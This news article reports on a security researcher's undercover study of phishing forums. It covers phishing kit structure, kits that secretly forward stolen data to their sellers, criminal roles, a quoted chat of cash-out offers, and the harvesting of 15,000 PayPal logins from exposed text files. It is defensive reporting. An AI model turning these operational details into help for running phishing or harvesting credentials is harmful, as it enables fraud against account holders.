Jason Harbert was a terrible spammer.
The research scientist for Cloudmark recently spent weeks monitoring the phishing communitys chat rooms and forums, learned the lingo, earned some trust, and even received kits from the fraudsters who set up scam pages that steal victims personal data. Then he went and hurt the criminals feelings after not coming through on the spam delivery.
But he did come out of the experience with extensive data and insight on every aspect of the underground marketplace, including how the attacks are orchestrated and how phishing kits work—including their structure, so-called “brain files” and even new pyramid schemes linked to the spread of the kits.
After weeks of undercover research into the phishing community, Cloudmark contends that the availability of these automated phishing kits, costing $10 or $20, has made it a breeze for novices to start up operations and has caused a sharp rise in phishing attacks.
Hacker toolkits are nothing new. Recent news reports have even pointed to certified ethical hacking toolkits for sale on eBay, such as in this expired listing, which contained similar items still for sale as of Sept. 21.
Security vendor Tier-3, headquartered in Sydney, shrugs off the proposition that these above-ground sales are above-board in their connection to ethical hacking certification, saying that they contain surreptitious Trojan loaders and Web site hacking utilities that can be used for criminal black-hat hacking.
“It basically puts high-level hacking tools … into the hands of almost any Internet user—including novices—providing they have an eBay and PayPal account,” said Tier-3 CTO Geoff Sweeney in a statement.
Sweeney said that where previously would-be hackers “had to score brownie points to gain access to the hacker forums and source the kits”—as did Harbert—the fact that they are now on open sale on eBay is “very worrying.”
Although he hasnt looked at the eBay kits, Harbert said that if what Sweeney claims is true, the ethical kits are likely being used to commit cyber-crimes. “Most ethical hacking courses focus [on] techniques, rather than hacking kits, per se,” Harbert said. “But, there may be ethical hacking kits that Im not aware of. If there are, it is almost certain that they would be leaked to the black-hat hackers and used for fraudulent activities.”
The number of phishing reports hit an all-time high of 55,000 in April, according to a trend report put out at the time by the Anti-Phishing Working Group.
The rise in phishing attacks, Cloudmark says, is due both to the profits involved and the ease of carrying them out. Phishing kits—aka “scam pages” in the phishing community—are a collection of files to create a comprehensive phishing site.
The individual components work to automatically collect, store and send a victims personal information back to the phisher. Theyre widely available, the company says, and typically cost $10 to $20, often sold in a group with multiple kits targeted to specific financial institutions or organizations, such as Bank of America or eBay.
Harbert described the phishing community as being made up of specific roles and jobs. The role of a spammer, for example, is to create and send e-mail messages with a link to the phishing site. Spammers often use botnets to send messages in bulk in a short period of time. Using botnets means spammers can hit the inboxes of a large number of people before anti-spam products latch onto the message within the spam and begin to filter for it.
Another role in the community is that of the casher. These community members advertise their services in cashing out compromised bank accounts, such as Wells Fargo accounts.
Going Undercover in the
Slimy World of Phishing”>
Cloudmark published a whitepaper on the undercover work in which the company quoted this sample discussion from a phishing channel:
14:29 < Droper> cashout any us bank like Wachovia,Wells,Chase,Citibank,Boa,Wamu amd all uk banks and some Canada Banks also Pick WU and MG and drops for merchandise and drop for Billpay msg me for deal
14:31 < jiciuvyu> i have e-gold,root,paypal,poste.it,php mailer,php sender inbox,scam pages,ebay extractor,mail extractor,bank logins,and need wells drop prv me
The user with the handle “Droper” is a casher advertising the banks he or she can extract currency from. The other user, “jiciuvyu,” is advertising phishing tools and information available and also is requesting a “wells drop,” meaning a Wells Fargo bank account to transfer—or to “drop”—money into.
Read more here about a phisher who was convicted of defrauding AOL customers.
After talking the talk for a few weeks, Harbert convinced users to send tools and phishing kits. He found within the kits HTML files, PHP files and a variety of Web files.
Would-be phishers unzip a kit and run it. When deployed on a server, the kit creates an automatic phishing attack. The phisher inserts his or her e-mail address into the configuration file so that when a victim falls for the attack, his or her information is automatically forwarded to the phisher.
What surprised Harbert, he said, was to find that the variety of kits all shared a common set of back-end files—what he calls the “brain files,” with the same names.
Phishing monitoring companies are seeing an explosion of these kits—not surprising, given that theyre “simple, easy and cheap” to run, Harbert said.
Looking deeper, he discovered that novice phishers are actually being scammed by advanced phishers. Those advanced phishers are writing and selling kits that include secret, obfuscated code that e-mails stolen information not only back to the primary phisher but to the original phisher who sold him or her the kit.
Harbert also discovered what he says is a new phishing variant: the storage of stolen information in flat text files. Besides e-mailing the information to phishers, the kits are also writing all data to text files in the directory of a given attack. Harbert found that those text files have common names. Those names are actually viewable on sites that report real-time phishing attacks, as does Cloudmark.
After writing a script to automatically retrieve the text files from such sites, Harbert was able to find PayPal account numbers from plain flat text files—in other words, PayPal accounts in plain, unencrypted text. He thus obtained 15,000 PayPal accounts, including user names and passwords, using no phishing techniques whatsoever—just a simple automated search on publicly available feeds.
Harbert also discovered a new trend within the community: unique attacks for every victim. Kits that create unique scam URLs for each target are a highly desirable thing for phishers, given that they render the shutdown of a particular attack irrelevant.
Another role in the community is that of the rip-off artist who steals from the phishers. Called a “ripper,” such an individual promises to cash out a compromised account but instead just takes off with the money.
Armed with such terms, Harbert said it was easy to infiltrate the community. “Just go in and talk the talk, say youre interested, that you want to make a lot of money, that you want to help them with attacks,” he said. “I pretended to be a spammer. … A lot of phishers sent a kit, and I didnt do the work, and they were really kind of heartbroken. One guy told me I really hurt his feelings.”
Lisa Vaas can be contacted at [email protected]
Check out eWEEK.coms Security Center for the latest security news, reviews and analysis. And for insights on security coverage around the Web, take a look at eWEEKs Security Watch blog.